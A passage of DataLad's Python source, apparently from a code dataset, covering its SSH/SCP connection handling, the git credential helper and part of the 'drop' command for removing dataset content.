stdin=None, log_output=True):\n cmd = self._adjust_cmd_for_bundle_execution(cmd)\n\n for opt in options or []:\n ssh_cmd.extend([\"-o\", opt])\n\n # build SSH call, feed remote command as a single last argument\n # whatever it contains will go to the remote machine for execution\n # we cannot perform any sort of escaping, because it will limit\n # what we can do on the remote, e.g. concatenate commands with '&&'\n ssh_cmd += [self.sshri.as_str()] + [cmd]\n\n lgr.debug(\"%s is used to run %s\", self, ssh_cmd)\n\n # TODO: pass expect parameters from above?\n # Hard to explain to toplevel users ... So for now, just set True\n out = self.runner.run(\n ssh_cmd,\n protocol=StdOutErrCapture if log_output else NoCapture,\n stdin=stdin)\n return out['stdout'], out['stderr']\n\n def _get_scp_command_spec(self, recursive, preserve_attrs):\n \"\"\"Internal helper for SCP interface methods\"\"\"\n # Convert ssh's port flag (-p) to scp's (-P).\n scp_options = [\"-P\" if x == \"-p\" else x for x in self._ssh_args]\n # add recursive, preserve_attributes flag if recursive, preserve_attrs set and create scp command\n scp_options += [\"-r\"] if recursive else []\n scp_options += [\"-p\"] if preserve_attrs else []\n return [\"scp\"] + scp_options\n\n def _quote_filename(self, filename):\n if self.ssh_version and self.ssh_version[0] < 9:\n return _quote_filename_for_scp(filename)\n\n # no filename quoting for OpenSSH version 9 and above\n return filename\n\n def put(self, source, destination, recursive=False, preserve_attrs=False):\n \"\"\"Copies source file/folder to destination on the remote.\n\n Note: this method performs escaping of filenames to an extent that\n moderately weird ones should work (spaces, quotes, pipes, other\n characters with special shell meaning), but more complicated cases\n might require appropriate external preprocessing of filenames.\n\n Parameters\n ----------\n source : str or list\n file/folder path(s) to copy from on local\n destination : str\n file/folder path to copy to on remote\n recursive : bool\n flag to enable recursive copying of given sources\n preserve_attrs : bool\n preserve modification times, access times, and modes from the\n original file\n\n Returns\n -------\n str\n stdout, stderr of the copy operation.\n \"\"\"\n # make sure we have an open connection, will test if action is needed\n # by itself\n self.open()\n scp_cmd = self._get_scp_command_spec(recursive, preserve_attrs)\n # add source filepath(s) to scp command\n scp_cmd += ensure_list(source)\n # add destination path\n scp_cmd += ['%s:%s' % (\n self.sshri.hostname,\n self._quote_filename(destination),\n )]\n out = self.runner.run(scp_cmd, protocol=StdOutErrCapture)\n return out['stdout'], out['stderr']\n\n def get(self, source, destination, recursive=False, preserve_attrs=False):\n \"\"\"Copies source file/folder from remote to a local destination.\n\n Note: this method performs escaping of filenames to an extent that\n moderately weird ones should work (spaces, quotes, pipes, other\n characters with special shell meaning), but more complicated cases\n might require appropriate external preprocessing of filenames.\n\n Parameters\n ----------\n source : str or list\n file/folder path(s) to copy from the remote host\n destination : str\n file/folder path to copy to on the local host\n recursive : bool\n flag to enable recursive copying of given sources\n preserve_attrs : bool\n preserve modification times, access times, and modes from the\n original file\n\n Returns\n -------\n str\n stdout, stderr of the copy operation.\n \"\"\"\n # make sure we have an open connection, will test if action is needed\n # by itself\n self.open()\n scp_cmd = self._get_scp_command_spec(recursive, preserve_attrs)\n # add source filepath(s) to scp command, prefixed with the remote host\n scp_cmd += [\"%s:%s\" % (self.sshri.hostname, self._quote_filename(s))\n for s in ensure_list(source)]\n # add destination path\n scp_cmd += [destination]\n out = self.runner.run(scp_cmd, protocol=StdOutErrCapture)\n return out['stdout'], out['stderr']\n\n def get_annex_installdir(self):\n key = 'installdir:annex'\n if key in self._remote_props:\n return self._remote_props[key]\n annex_install_dir = None\n # already set here to avoid any sort of recursion until we know\n # more\n self._remote_props[key] = annex_install_dir\n try:\n with tempfile.TemporaryFile() as tempf:\n # TODO does not work on windows\n annex_install_dir = self(\n # use sh -e to be able to fail at each stage of the process\n \"sh -e -c 'dirname $(readlink -f $(which git-annex-shell))'\"\n , stdin=tempf\n )[0].strip()\n except CommandError as e:\n lgr.debug('Failed to locate remote git-annex installation: %s',\n CapturedException(e))\n self._remote_props[key] = annex_install_dir\n return annex_install_dir\n\n def get_annex_version(self):\n key = 'cmd:annex'\n if key in self._remote_props:\n return self._remote_props[key]\n try:\n # modern annex versions\n version = self('git annex version --raw')[0]\n except CommandError:\n # either no annex, or old version\n try:\n # fall back on method that could work with older installations\n out, err = self('git annex version')\n version = out.split('\\n')[0].split(':')[1].strip()\n except CommandError as e:\n lgr.debug('Failed to determine remote git-annex version: %s',\n CapturedException(e))\n version = None\n self._remote_props[key] = version\n return version\n\n def get_git_version(self):\n key = 'cmd:git'\n if key in self._remote_props:\n return self._remote_props[key]\n git_version = None\n try:\n git_version = self('git version')[0].split()[2]\n except CommandError as e:\n lgr.debug('Failed to determine Git version: %s',\n CapturedException(e))\n self._remote_props[key] = git_version\n return git_version\n\n\n@auto_repr\nclass NoMultiplexSSHConnection(BaseSSHConnection):\n \"\"\"Representation of an SSH connection.\n\n The connection is opened for execution of a single process, and closed\n as soon as the process end.\n \"\"\"\n def __call__(self, cmd, options=None, stdin=None, log_output=True):\n\n # there is no dedicated \"open\" step, put all args together\n ssh_cmd = [self.ssh_executable] + self._ssh_open_args + self._ssh_args\n return self._exec_ssh(\n ssh_cmd,\n cmd,\n options=options,\n stdin=stdin,\n log_output=log_output)\n\n def is_open(self):\n return False\n\n def open(self):\n return False\n\n def close(self):\n # we perform blocking execution, we should not return from __call__ until\n # the connection is already closed\n pass\n\n\n@auto_repr\nclass MultiplexSSHConnection(BaseSSHConnection):\n \"\"\"Representation of a (shared) ssh connection.\n \"\"\"\n def __init__(self, ctrl_path, sshri, **kwargs):\n \"\"\"Create a connection handler\n\n The actual opening of the connection is performed on-demand.\n\n Parameters\n ----------\n ctrl_path: str\n path to SSH controlmaster\n sshri: SSHRI\n SSH resource identifier (contains all connection-relevant info),\n or another resource identifier that can be converted into an SSHRI.\n **kwargs\n Pass on to BaseSSHConnection\n \"\"\"\n super().__init__(sshri, **kwargs)\n\n # on windows cmd args lists are always converted into a string using appropriate\n # quoting rules, on other platforms args lists are passed directly and we need\n # to take care of quoting ourselves\n ctrlpath_arg = \"ControlPath={}\".format(ctrl_path if on_windows else sh_quote(str(ctrl_path)))\n self._ssh_args += [\"-o\", ctrlpath_arg]\n self._ssh_open_args += [\n \"-fN\",\n \"-o\", \"ControlMaster=auto\",\n \"-o\", \"ControlPersist=15m\",\n ]\n self.ctrl_path = Path(ctrl_path)\n self._opened_by_us = False\n # used by @fasteners.locked\n self._lock = [\n threading.Lock(),\n fasteners.process_lock.InterProcessLock(self.ctrl_path.with_suffix('.lck'))\n ]\n\n def __call__(self, cmd, options=None, stdin=None, log_output=True):\n\n # XXX: check for open socket once\n # and provide roll back if fails to run and was not explicitly\n # checked first\n # MIH: this would mean that we would have to distinguish failure\n # of a payload command from failure of SSH itself. SSH however,\n # only distinguishes success and failure of the entire operation\n # Increase in fragility from introspection makes a potential\n # performance benefit a questionable improvement.\n # make sure we have an open connection, will test if action is needed\n # by itself\n self.open()\n\n ssh_cmd = [self.ssh_executable] + self._ssh_args\n return self._exec_ssh(\n ssh_cmd,\n cmd,\n options=options,\n stdin=stdin,\n log_output=log_output)\n\n def _assemble_multiplex_ssh_cmd(self, additional_arguments):\n return [self.ssh_executable] \\\n + additional_arguments \\\n + self._ssh_args \\\n + [self.sshri.as_str()]\n\n def is_open(self):\n if not self.ctrl_path.exists():\n lgr.log(\n 5,\n \"Not opening %s for checking since %s does not exist\",\n self, self.ctrl_path\n )\n return False\n # check whether controlmaster is still running:\n cmd = self._assemble_multiplex_ssh_cmd([\"-O\", \"check\"])\n\n lgr.debug(\"Checking %s by calling %s\", self, cmd)\n try:\n # expect_stderr since ssh would announce to stderr\n # \"Master is running\" and that is normal, not worthy warning about\n # etc -- we are doing the check here for successful operation\n with tempfile.TemporaryFile() as tempf:\n self.runner.run(\n cmd,\n # do not leak output\n protocol=StdOutErrCapture,\n stdin=tempf)\n res = True\n except CommandError as e:\n if e.code != 255:\n # this is not a normal SSH error, whine ...\n raise e\n # SSH died and left socket behind, or server closed connection\n self.close()\n res = False\n lgr.debug(\n \"Check of %s has %s\",\n self,\n {True: 'succeeded', False: 'failed'}[res])\n return res\n\n @fasteners.locked\n def open(self):\n \"\"\"Opens the connection.\n\n In other words: Creates the SSH ControlMaster to be used by this\n connection, if it is not there already.\n\n Returns\n -------\n bool\n True when SSH reports success opening the connection, False when\n a ControlMaster for an open connection already exists.\n\n Raises\n ------\n ConnectionOpenFailedError\n When starting the SSH ControlMaster process failed.\n \"\"\"\n # the socket should vanish almost instantly when the connection closes\n # sending explicit 'check' commands to the control master is expensive\n # (needs tempfile to shield stdin, Runner overhead, etc...)\n # as we do not use any advanced features (forwarding, stop[ing the\n # master without exiting) it should be relatively safe to just perform\n # the much cheaper check of an existing control path\n if self.ctrl_path.exists():\n return False\n\n # create ssh control master command\n cmd = self._assemble_multiplex_ssh_cmd(self._ssh_open_args)\n\n # start control master:\n lgr.debug(\"Opening %s by calling %s\", self, cmd)\n # The following call is exempt from bandit's security checks because\n # we/the user control the content of 'cmd'.\n proc = Popen(cmd) # nosec\n stdout, stderr = proc.communicate(input=\"\\n\") # why the f.. this is necessary?\n\n # wait till the command exits, connection is conclusively\n # open or not at this point\n exit_code = proc.wait()\n\n if exit_code != 0:\n raise ConnectionOpenFailedError(\n cmd,\n 'Failed to open SSH connection (could not start ControlMaster process)',\n exit_code,\n stdout,\n stderr,\n )\n self._opened_by_us = True\n return True\n\n def close(self):\n if not self._opened_by_us:\n lgr.debug(\"Not closing %s since was not opened by itself\", self)\n return\n # stop controlmaster:\n cmd = self._assemble_multiplex_ssh_cmd([\"-O\", \"stop\"])\n lgr.debug(\"Closing %s by calling %s\", self, cmd)\n try:\n self.runner.run(cmd, protocol=StdOutErrCapture)\n except CommandError as e:\n lgr.debug(\"Failed to run close command\")\n if self.ctrl_path.exists():\n lgr.debug(\"Removing existing control path %s\", self.ctrl_path)\n # socket need to go in any case\n self.ctrl_path.unlink()\n if e.code != 255:\n # not a \"normal\" SSH error\n raise e\n\n\n@auto_repr\nclass BaseSSHManager(object):\n \"\"\"Interface for an SSHManager\n \"\"\"\n def ensure_initialized(self):\n \"\"\"Ensures that manager is initialized\"\"\"\n pass\n\n assure_initialized = ensure_initialized\n\n def get_connection(self, url, use_remote_annex_bundle=None, force_ip=False):\n \"\"\"Get an SSH connection handler\n\n Parameters\n ----------\n url: str\n ssh url\n use_remote_annex_bundle : bool, optional\n If enabled, look for a git-annex installation on the remote and\n prefer its Git binaries in the search path (i.e. prefer a bundled\n Git over a system package). See also the configuration setting\n datalad.ssh.try-use-annex-bundled-git\n force_ip : {False, 4, 6}\n Force the use of IPv4 or IPv6 addresses.\n\n Returns\n -------\n BaseSSHConnection\n\n .. versionchanged:: 0.16\n The default for `use_remote_annex_bundle` changed from `True`\n to `None`. Instead of attempting to use a potentially available\n git-annex bundle on the remote host by default, this behavior\n is now conditional on the `datalad.ssh.try-use-annex-bundled-git`\n (off by default).\n \"\"\"\n raise NotImplementedError\n\n def _prep_connection_args(self, url):\n # parse url:\n from datalad.support.network import RI, is_ssh\n if isinstance(url, RI):\n sshri = url\n else:\n if ':' not in url and '/' not in url:\n # it is just a hostname\n lgr.debug(\"Assuming %r is just a hostname for ssh connection\",\n url)\n url += ':'\n sshri = RI(url)\n\n if not is_ssh(sshri):\n raise ValueError(\"Unsupported SSH URL: '{0}', use \"\n \"ssh://host/path or host:path syntax\".format(url))\n\n from datalad import cfg\n identity_file = cfg.get(\"datalad.ssh.identityfile\")\n return sshri, identity_file\n\n def close(self, allow_fail=True):\n \"\"\"Closes all connections, known to this instance.\n\n Parameters\n ----------\n allow_fail: bool, optional\n If True, swallow exceptions which might be thrown during\n connection.close, and just log them at DEBUG level\n \"\"\"\n pass\n\n\n@auto_repr\nclass NoMultiplexSSHManager(BaseSSHManager):\n \"\"\"Does not \"manage\" and just returns a new connection\n \"\"\"\n\n def get_connection(self, url, use_remote_annex_bundle=None, force_ip=False):\n sshri, identity_file = self._prep_connection_args(url)\n\n return NoMultiplexSSHConnection(\n sshri,\n identity_file=identity_file,\n use_remote_annex_bundle=use_remote_annex_bundle,\n force_ip=force_ip,\n )\n\n\n@auto_repr\nclass MultiplexSSHManager(BaseSSHManager):\n \"\"\"Keeps ssh connections to share. Serves singleton representation\n per connection.\n\n A custom identity file can be specified via `datalad.ssh.identityfile`.\n Callers are responsible for reloading `datalad.cfg` if they have changed\n this value since loading datalad.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self._socket_dir = None\n self._connections = dict()\n # Initialization of prev_connections is happening during initial\n # handling of socket_dir, so we do not define them here explicitly\n # to an empty list to fail if logic is violated\n self._prev_connections = None\n # and no explicit initialization in the constructor\n # self.ensure_initialized()\n\n @property\n def socket_dir(self):\n \"\"\"Return socket_dir, and if was not defined before,\n and also pick up all previous connections (if any)\n \"\"\"\n self.ensure_initialized()\n return self._socket_dir\n\n def ensure_initialized(self):\n \"\"\"Assures that manager is initialized - knows socket_dir, previous connections\n \"\"\"\n if self._socket_dir is not None:\n return\n from datalad import cfg\n self._socket_dir = Path(cfg.obtain('datalad.locations.sockets'))\n self._socket_dir.mkdir(exist_ok=True, parents=True)\n try:\n os.chmod(str(self._socket_dir), 0o700)\n except OSError as exc:\n lgr.warning(\n \"Failed to (re)set permissions on the %s. \"\n \"Most likely future communications would be impaired or fail. \"\n \"Original exception: %s\",\n self._socket_dir, CapturedException(exc)\n )\n\n try:\n self._prev_connections = [p\n for p in self.socket_dir.iterdir()\n if not p.is_dir()]\n except OSError as exc:\n self._prev_connections = []\n lgr.warning(\n \"Failed to list %s for existing sockets. \"\n \"Most likely future communications would be impaired or fail. \"\n \"Original exception: %s\",\n self._socket_dir, CapturedException(exc)\n )\n\n lgr.log(5,\n \"Found %d previous connections\",\n len(self._prev_connections))\n assure_initialized = ensure_initialized\n\n def get_connection(self, url, use_remote_annex_bundle=None, force_ip=False):\n\n sshri, identity_file = self._prep_connection_args(url)\n\n conhash = get_connection_hash(\n sshri.hostname,\n port=sshri.port,\n identity_file=identity_file or \"\",\n username=sshri.username,\n force_ip=force_ip,\n )\n # determine control master:\n ctrl_path = self.socket_dir / conhash\n\n # do we know it already?\n if ctrl_path in self._connections:\n return self._connections[ctrl_path]\n else:\n c = MultiplexSSHConnection(\n ctrl_path, sshri, identity_file=identity_file,\n use_remote_annex_bundle=use_remote_annex_bundle,\n force_ip=force_ip)\n self._connections[ctrl_path] = c\n return c\n\n def close(self, allow_fail=True, ctrl_path=None):\n \"\"\"Closes all connections, known to this instance.\n\n Parameters\n ----------\n allow_fail: bool, optional\n If True, swallow exceptions which might be thrown during\n connection.close, and just log them at DEBUG level\n ctrl_path: str, Path, or list of str or Path, optional\n If specified, only the path(s) provided would be considered\n \"\"\"\n if self._connections:\n ctrl_paths = [Path(p) for p in ensure_list(ctrl_path)]\n to_close = [c for c in self._connections\n # don't close if connection wasn't opened by SSHManager\n if self._connections[c].ctrl_path\n not in self._prev_connections and\n self._connections[c].ctrl_path.exists()\n and (not ctrl_paths\n or self._connections[c].ctrl_path in ctrl_paths)]\n if to_close:\n lgr.debug(\"Closing %d SSH connections...\", len(to_close))\n for cnct in to_close:\n f = self._connections[cnct].close\n if allow_fail:\n f()\n else:\n try:\n f()\n except Exception as exc:\n ce = CapturedException(exc)\n lgr.debug(\"Failed to close a connection: \"\n \"%s\", ce.message)\n self._connections = dict()\n\n\n# retain backward compat with 0.13.4 and earlier\n# should be ok since cfg already defined by the time this one is imported\nfrom .. import cfg\nif cfg.obtain('datalad.ssh.multiplex-connections'):\n SSHManager = MultiplexSSHManager\n SSHConnection = MultiplexSSHConnection\nelse:\n SSHManager = NoMultiplexSSHManager\n SSHConnection = NoMultiplexSSHConnection\n\n\ndef _quote_filename_for_scp(name):\n \"\"\"Manually escape shell goodies in a file name.\n\n Why manual? Because the author couldn't find a better way, and\n simply quoting the entire filename does not work with SCP's overly\n strict file matching criteria (likely a bug on their side).\n\n Hence this beauty:\n \"\"\"\n for s, t in (\n (' ', '\\\\ '),\n ('\"', '\\\\\"'),\n (\"'\", \"\\\\'\"),\n (\"&\", \"\\\\&\"),\n (\"|\", \"\\\\|\"),\n (\">\", \"\\\\>\"),\n (\"<\", \"\\\\<\"),\n (\";\", \"\\\\;\")):\n name = name.replace(s, t)\n return name\n" }, { "alpha_fraction": 0.6507764458656311, "alphanum_fraction": 0.6518598794937134, "avg_line_length": 42.72105407714844, "blob_id": "8604d6e5bc61c83ea72628b65f67f62cf751c3eb", "content_id": "2a7626d98df2e2fef50af71ad5e908d0a44c442f", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8307, "license_type": "permissive", "max_line_length": 80, "num_lines": 190, "path": "/datalad/local/gitcredential_datalad.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import sys\n\nfrom datalad.downloaders import (\n GitCredential,\n UserPassword,\n)\nfrom datalad.downloaders.providers import (\n AUTHENTICATION_TYPES,\n Providers,\n)\nfrom datalad.local.gitcredential import _credspec2dict\nfrom datalad import ConfigManager\n\ngit_credential_datalad_help = \"\"\"\\\nGit credential interface to DataLad's credential management system.\n\nIn order to use this, one needs to configure git to use the credential helper\n'datalad'. In the simplest case this can be achieved by 'git config --add\n--global credential.helper datalad'. This can be restricted to apply to\ncertain URLs only. See 'man gitcredentials' and\nhttp://docs.datalad.org/credentials.html for details.\n\nOnly DataLad's UserPassword-type credentials are supported. This helper\npasses standard 'get', 'store' actions on to the respective interfaces in\nDataLad.\nThe 'erase' action is not supported, since this is called by Git, when the\ncredentials didn't work for a URL. However, DataLad's providers store a regex\nfor matching URLs. That regex-credential combo may still be valid and simply\ntoo broad. We wouldn't want to auto-delete in that case. Another case is a\nsomewhat circular setup: Another credential-helper provided the credentials and\nis also used by DataLad. The provider config connecting it to DataLad could be\nintentionally broad. Deleting credentials from keyring but keeping the provider\nconfig pointing to them, on the other hand, would be even worse, as it would\ninvalidate the provider config and also means rejecting credentials w/o context.\nHence, this helper doesn't do anything on 'erase' at the moment.\n\nusage: git credential-datalad [option] <action>\n\noptions:\n -h Show this help.\n\nIf DataLad's config variable 'datalad.credentials.githelper.noninteractive' is\nset: Don't ask for user confirmation when storing to DataLad's credential\nsystem. This may fail if default names result in a conflict with existing ones.\nThis mode is used for DataLad's CI tests. Note, that this config can not\nreliably be read from local configs (a repository's .git/config or\n.datalad/config) as this credential helper when called by Git doesn't get to\nknow what repository it is operating on.\n\"\"\"\n\n\ndef git_credential_datalad():\n \"\"\"Entrypoint to query DataLad's credentials via git-credential\n \"\"\"\n\n if len(sys.argv) != 2 \\\n or sys.argv[1] == \"-h\" \\\n or sys.argv[1] not in ['get', 'store', 'erase']:\n help_explicit = sys.argv[1] == \"-h\"\n print(git_credential_datalad_help,\n file=sys.stdout if help_explicit else sys.stderr)\n sys.exit(0 if help_explicit else 1)\n\n cfg = ConfigManager()\n interactive = not cfg.obtain(\"datalad.credentials.githelper.noninteractive\")\n action = sys.argv[-1]\n attrs = _credspec2dict(sys.stdin)\n\n # This helper is intended to be called by git. While git-credential takes a\n # `url` property of the description, what it passes on is `protocol`, `host`\n # and potentially `path` (if instructed to useHttpPath by config).\n # For communication with datalad's credential system, we need to reconstruct\n # the url, though.\n assert 'protocol' in attrs.keys()\n assert 'host' in attrs.keys()\n if 'url' not in attrs:\n attrs['url'] = \"{protocol}://{host}{path}\".format(\n protocol=attrs.get('protocol'),\n host=attrs.get('host'),\n path=\"/{}\".format(attrs.get('path')) if 'path' in attrs else \"\"\n )\n\n # Get datalad's provider configs.\n providers = Providers.from_config_files()\n\n if action == 'get':\n _action_get(attrs, providers)\n elif action == 'store':\n _action_store(attrs, interactive, providers)\n\n\ndef _action_store(attrs, interactive, providers):\n # Determine the defaults to use for storing. In non-interactive mode,\n # this is what's going to be stored, in interactive mode user is\n # presented with them as default choice.\n # We don't really know what authentication type makes sense to store in\n # the provider config (this would be relevant for datalad using those\n # credentials w/o git).\n # However, pick 'http_basic_auth' in case of HTTP(S) URL and 'none'\n # otherwise as the default to pass into store routine.\n if attrs.get('protocol') in ['http', 'https']:\n authentication_type = 'http_basic_auth'\n else:\n authentication_type = 'none'\n # If we got a `path` component from git, usehttppath is set and thereby\n # git was instructed to include it when matching. Hence, do the same.\n url_re = \"{pr}://{h}{p}.*\".format(pr=attrs.get('protocol'),\n h=attrs.get('host'),\n p=\"/\" + attrs.get('path')\n if \"path\" in attrs.keys() else \"\")\n name = attrs.get('host')\n credential_name = name\n credential_type = \"user_password\"\n if not interactive:\n\n # TODO: What about credential labels? This could already exist as\n # well. However, it's unlikely since the respective\n # \"service name\" for keyring is prepended with \"datalad-\".\n # For the same reason of how the keyring system is used by\n # datalad it's not very transparently accessible what labels\n # we'd need to check for. Rather than encoding knowledge about\n # datalad's internal handling here, let's address that in\n # datalad's provider and credential classes and have an easy\n # check to be called from here.\n if any(p.name == name for p in providers):\n print(f\"Provider name '{name}' already exists. This can't be \"\n \"resolved in non-interactive mode.\",\n file=sys.stderr)\n\n authenticator_class = AUTHENTICATION_TYPES[authentication_type]\n saved_provider = providers._store_new(\n url=attrs.get('url'),\n authentication_type=authentication_type,\n authenticator_class=authenticator_class,\n url_re=url_re,\n name=name,\n credential_name=credential_name,\n credential_type=credential_type,\n level='user'\n )\n else:\n # use backend made for annex special remotes for interaction from a\n # subprocess whose stdin/stdout are in use for communication with\n # its parent\n from datalad.ui import ui\n ui.set_backend('annex')\n\n # ensure default is first in list (that's how `enter_new` determines\n # it's the default)\n auth_list = AUTHENTICATION_TYPES.copy()\n auth_list.pop(authentication_type, None)\n auth_list = [authentication_type] + list(auth_list.keys())\n\n saved_provider = providers.enter_new(\n url=attrs.get('url'),\n auth_types=auth_list,\n url_re=url_re,\n name=name,\n credential_name=credential_name,\n credential_type=credential_type)\n saved_provider.credential.set(user=attrs['username'],\n password=attrs['password'])\n\n\ndef _action_get(attrs, providers):\n # query datalad and report if it knows anything, or be silent\n # git handles the rest\n provider = providers.get_provider(attrs['url'],\n only_nondefault=True)\n if provider is None \\\n or provider.credential is None \\\n or not isinstance(provider.credential, UserPassword):\n # datalad doesn't know or only has a non UserPassword credential for\n # this URL - create empty entry\n dlcred = UserPassword()\n else:\n dlcred = provider.credential\n # Safeguard against circular querying. We are a git-credential-helper.\n # If we find a datalad credential that tells DataLad to query Git, we\n # need to ignore it. Otherwise we'd end up right here again.\n if isinstance(provider.credential, GitCredential):\n # Just return the unchanged description we got from Git\n for k, v in attrs.items():\n print('{}={}'.format(k, v))\n return\n\n for dlk, gitk in (('user', 'username'), ('password', 'password')):\n val = dlcred.get(dlk)\n if val is not None:\n print('{}={}'.format(gitk, val))\n" }, { "alpha_fraction": 0.5610083937644958, "alphanum_fraction": 0.5615088939666748, "avg_line_length": 37.24282455444336, "blob_id": "73e3990ab1c7bd43b2280cf534a62a3856ed1d86", "content_id": "8bc7047e37499c2097e30bda41a373f4540f60b8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31971, "license_type": "permissive", "max_line_length": 87, "num_lines": 836, "path": "/datalad/distributed/drop.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for dropping dataset content\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom itertools import chain\nimport warnings\n\nfrom datalad.core.local.status import get_paths_by_ds\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import (\n annexjson2result,\n results_from_annex_noinfo,\n success_status_map,\n)\nfrom datalad.runner.exception import CommandError\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n ensure_list,\n rmtree,\n)\n\nlgr = logging.getLogger('datalad.distributed.drop')\n\n\n@build_doc\nclass Drop(Interface):\n \"\"\"Drop content of individual files or entire (sub)datasets\n\n This command is the antagonist of 'get'. It can undo the retrieval of file\n content, and the installation of subdatasets.\n\n Dropping is a safe-by-default operation. Before dropping any information,\n the command confirms the continued availability of file-content (see e.g.,\n configuration 'annex.numcopies'), and the state of all dataset branches\n from at least one known dataset sibling. Moreover, prior removal of an\n entire dataset annex, that it is confirmed that it is no longer marked\n as existing in the network of dataset siblings.\n\n Importantly, all checks regarding version history availability and local\n annex availability are performed using the current state of remote\n siblings as known to the local dataset. This is done for performance\n reasons and for resilience in case of absent network connectivity. To\n ensure decision making based on up-to-date information, it is advised to\n execute a dataset update before dropping dataset components.\n \"\"\"\n _examples_ = [\n {'text': \"Drop single file content\",\n 'code_py': \"drop('path/to/file')\",\n 'code_cmd': \"datalad drop <path/to/file>\"},\n {'text': \"Drop all file content in the current dataset\",\n 'code_py': \"drop('.')\",\n 'code_cmd': \"datalad drop\"},\n {'text': \"Drop all file content in a dataset and all its subdatasets\",\n 'code_py': \"drop(dataset='.', recursive=True)\",\n 'code_cmd': \"datalad drop -d <path/to/dataset> -r\"},\n {'text': \"Disable check to ensure the configured minimum number of \"\n \"remote sources for dropped data\",\n 'code_py': \"drop(path='path/to/content', reckless='availability')\",\n 'code_cmd': \"datalad drop <path/to/content> --reckless availability\"},\n {'text': 'Drop (uninstall) an entire dataset '\n '(will fail with subdatasets present)',\n 'code_py': \"drop(what='all')\",\n 'code_cmd': \"datalad drop --what all\"},\n {'text': 'Kill a dataset recklessly with any existing subdatasets too'\n '(this will be fast, but will disable any and all safety '\n 'checks)',\n 'code_py': \"drop(what='all', reckless='kill', recursive=True)\",\n 'code_cmd': \"datalad drop --what all, --reckless kill --recursive\"},\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar=\"DATASET\",\n doc=\"\"\"specify the dataset to perform drop from.\n If no dataset is given, the current working directory is used\n as operation context\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"path of a dataset or dataset component to be dropped\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n reckless=Parameter(\n args=(\"--reckless\",),\n doc=\"\"\"disable individual or all data safety measures that would\n normally prevent potentially irreversible data-loss.\n With 'modification', unsaved modifications in a dataset will not be\n detected. This improves performance at the cost of permitting\n potential loss of unsaved or untracked dataset components.\n With 'availability', detection of dataset/branch-states that are\n only available in the local dataset, and detection of an\n insufficient number of file-content copies will be disabled.\n Especially the latter is a potentially expensive check which might\n involve numerous network transactions.\n With 'undead', detection of whether a to-be-removed local annex is\n still known to exist in the network of dataset-clones is disabled.\n This could cause zombie-records of invalid file availability.\n With 'kill', all safety-checks are disabled.\"\"\",\n constraints=EnsureChoice(\n 'modification', 'availability', 'undead', 'kill', None)),\n what=Parameter(\n args=(\"--what\",),\n doc=\"\"\"select what type of items shall be dropped.\n With 'filecontent', only the file content (git-annex keys) of files\n in a dataset's worktree will be dropped.\n With 'allkeys', content of any version of any file in any branch\n (including, but not limited to the worktree) will be dropped. This\n effectively empties the annex of a local dataset.\n With 'datasets', only complete datasets will be dropped (implies\n 'allkeys' mode for each such dataset), but no filecontent will be\n dropped for any files in datasets that are not dropped entirely.\n With 'all', content for any matching file or dataset will be dropped\n entirely.\n \"\"\",\n # TODO add 'unwanted'\n constraints=EnsureChoice('filecontent', 'allkeys', 'datasets', 'all')),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n jobs=jobs_opt,\n check=Parameter(\n args=(\"--nocheck\",),\n doc=\"\"\"DEPRECATED: use '--reckless availability'\"\"\",\n action=\"store_false\",\n dest='check'),\n if_dirty=Parameter(\n args=(\"--if-dirty\",),\n doc=\"\"\"DEPRECATED and IGNORED: use --reckless instead\"\"\",),\n )\n\n @staticmethod\n @datasetmethod(name='drop')\n @eval_results\n def __call__(\n path=None,\n *,\n what='filecontent',\n reckless=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n jobs=None,\n # deprecated\n check=None,\n if_dirty=None):\n\n # TODO if reckless is None, initialize from a potential config setting\n # left behind by a reckless clone\n\n # proper spelling of mode switches is critical for implementation\n # below. double-check, also in Python API usage\n # TODO consider making a generic helper\n for label, value in (('what', what), ('reckless', reckless)):\n try:\n Drop._params_[label].constraints(value)\n except ValueError as e:\n raise ValueError(\n f\"Invalid '{label}' parameter value of: \"\n f\"{repr(value)} [{str(e)}]\") from e\n\n if check is not None:\n warnings.warn(\n \"The `check` argument of `datalad drop` is deprecated, \"\n \"use the `reckless` argument instead.\",\n DeprecationWarning)\n if if_dirty is not None:\n warnings.warn(\n \"The `if_dirty` argument of `datalad drop` is ignored, \"\n \"it can be removed for a safe-by-default behavior. For \"\n \"other cases consider the `reckless` argument.\",\n DeprecationWarning)\n\n if check is False:\n if reckless is not None:\n raise ValueError(\n 'Must not use deprecated `check` argument, and new '\n '`reckless` argument together with `datalad drop`.')\n reckless = 'availability'\n\n if what in ('all', 'datasets') and reckless == 'kill' and not recursive:\n raise ValueError(\n 'A reckless kill is requested but no recursion flag is set. '\n \"With 'kill' no checks for subdatasets will be made, \"\n 